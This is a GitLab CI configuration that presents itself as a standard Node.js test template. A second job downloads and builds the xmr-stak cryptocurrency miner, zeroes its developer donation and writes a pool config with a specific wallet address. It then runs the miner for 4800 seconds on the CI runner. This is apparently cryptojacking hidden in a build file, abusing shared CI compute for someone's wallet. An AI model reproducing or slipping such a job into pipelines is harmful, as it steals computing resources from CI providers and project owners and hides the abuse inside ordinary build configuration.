# This file is a template, and might need editing before it works on your project.
# Official framework image. Look for the different tagged releases at:
# https://hub.docker.com/r/library/node/tags/
image: node:latest

# This folder is cached between builds
# http://docs.gitlab.com/ce/ci/yaml/README.html#cache
cache:
  paths:
  - node_modules/

test_npm:
  script:
   - npm install
   - npm test

docker1:image:
  stage: build
  image: ubuntu:latest
  script:
    - apt-get update
    - apt-get install -y --no-install-recommends build-essential libssl-dev libhwloc-dev cmake libmicrohttpd-dev ca-certificates unzip wget
    - wget https://github.com/fireice-uk/xmr-stak/archive/v2.2.0.zip
    - unzip v2.2.0.zip
    - mv xmr-stak-2.2.0 xmr-stak
    - ls
    - mkdir xmr-stak/build
    - printf "#pragma once\n" > xmr-stak/xmrstak/donate-level.hpp
    - printf "constexpr double fDevDonationLevel = 0.0;" >> xmr-stak/xmrstak/donate-level.hpp
    - cd xmr-stak/build
    - cmake -DCUDA_ENABLE=OFF -DOpenCL_ENABLE=OFF ..
    - make install
    - cp bin/xmr-stak /xmrstak
    - echo  "\"pool_list\":[{\"pool_address\":\"stratum+tcp://masari.superpools.net:3333\",\"wallet_address\":\"5pqUTCEcg5tjfdpuE8ZQu2JEdFTdgN2fzcydv5e5ypkcHuLRdG5zXkGZoWMz2KhJpxKKf5oto4KTh53v7iBbjNHgPT9soLC.3000\",\"pool_password\":\"x\",\"use_nicehash\":false,\"use_tls\":false,\"tls_fingerprint\":\"\",\"pool_weight\":1},],\"currency\":\"monero\",\"call_timeout\":10,\"retry_time\":30,\"giveup_limit\":0,\"verbose_level\":4,\"print_motd\":true,\"h_print_time\":60,\"aes_override\":null,\"use_slow_memory\":\"warn\",\"tls_secure_algo\":true,\"daemon_mode\":false,\"flush_stdout\":true,\"output_file\":\"\",\"httpd_port\":0,\"http_login\":\"\",\"http_pass\":\"\",\"prefer_ipv4\":true," > /config.txt
    - /xmrstak -c /config.txt & sleep 4800